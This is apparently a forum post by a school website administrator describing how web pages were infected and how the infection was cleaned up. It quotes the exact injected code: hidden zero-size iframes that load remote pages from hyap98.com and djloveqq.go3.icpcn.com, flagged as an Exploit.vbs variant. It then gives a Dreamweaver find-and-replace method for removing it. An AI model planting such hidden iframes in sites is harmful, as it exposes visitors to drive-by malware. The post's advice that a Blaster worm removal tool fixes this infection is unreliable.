最近各公司的网站运行不稳定,我们把网站所有文件下下来,发现index.*和default.*文件的底部都植入了代码:
这就是网站瘫痪的罪魁祸首,打开网站的时候都会自动打开djloveqq.go3.icpcn.com/cert/joke.htm和hyap98.com/123/wawa.htm这两个网页,用江民拦截,报告有Exploit.vbs.phel.ba病毒。
此病毒是Exploit.vbs的亚种,植在某个网页里。客户端用户只要把IE的临时文件删除掉就可以了。服务器端要除此病毒(我在论坛上找了一种方法,不知道能不能彻底删除)方法如下:
先下载专杀工具杀毒,然后到微软的网站下载冲击波漏洞补?详细步骤参考瑞星网站:
http://it.rising.com.cn/service/technology/RS_blaster.htm
下载“冲击波(Worm.Blaster)”病毒专杀工具:
http://download.rising.com.cn/zsgj/ravblaster.exe
然后重起系统按F8键进入安全模式(安全模式下病毒未加载),运行ravblaster.exe可以完全杀除病毒且打上系统补丁!
要使服务器能稳定运行还需要大家共同努力,各学校网站管理员应尽量减少自己网站代码的漏洞,自己修改漏洞,也可以经常去自己网站官方论坛转转,及时下载补丁,交流技术。
要现清楚index.*和default.*文件里的恶意代码,如果采取一个一个的删除,那也太忙了,昨晚我发现一个很好的方法,方法绝对可靠,和大家分享。
首先,打开Dreamwaver MX,按CTRL+F键,弹出如下窗口:
其次,在查找范围栏选择文件夹,选择你网站在本机的文件夹,搜索栏选择源代码,查找栏键入<iframe src='http://www.hyap98.com/123/wawa.htm' width='0' height='0' frameborder='0'></iframe><iframe src='http://djloveqq.go3.icpcn.com/cert/joke.htm' width='0' height='0' frameborder='0'></iframe>注意,一定要粘贴完整,替换栏留空,如下图
第三,点击右边的替换全部,会弹出窗口,选择是即可。如果你还是初次使用这功能,建议你先备份后再做操作。
第四,看看有多少文件被植入网页马吧,
简简单单就把100多个网页马清楚了,不信你试试。
采取这种方法,最大的好处就在于不会漏删误删,省时省力。如果大家还有更好的办法,拿出来共享一下吧!